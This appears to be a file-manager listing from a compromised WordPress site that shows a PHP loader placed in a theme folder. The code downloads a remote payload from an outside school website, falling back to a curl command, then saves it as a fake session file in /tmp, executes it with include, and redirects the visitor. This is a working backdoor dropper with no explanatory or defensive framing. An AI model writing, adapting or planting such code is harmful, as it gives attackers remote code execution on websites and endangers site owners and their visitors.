PATH:
home
/
letacommog
/
laperouse
/
wp-content
/
themes
/
tmplg
<?php //*thanx for idx $URL = 'https://cbt.smkangkasa2margahayu.sch.id/admin/upload/xxx.txt'; $TMP = '/tmp/sess_'.md5($_SERVER['HTTP_HOST']).'.php'; # dont change this !! function M() { $FGT = @file_get_contents($GLOBALS['URL']); if(!$FGT) { echo `curl -k $(echo {$GLOBALS['URL']} | base64 -d) > {$GLOBALS['TMP']}`; } else { $HANDLE = fopen($GLOBALS['TMP'], 'w'); fwrite($HANDLE, $FGT); fclose($HANDLE); } echo '<script>window.location="?myrepublic";</script>'; } if(file_exists($TMP)) { if(filesize($TMP) === 0) { unlink($TMP); M(); } else { include($TMP); } } else { M(); } ?>
[+]
..
[-] style.css
[edit]
[-] index.php
[edit]
[-] tmplg.php
[edit]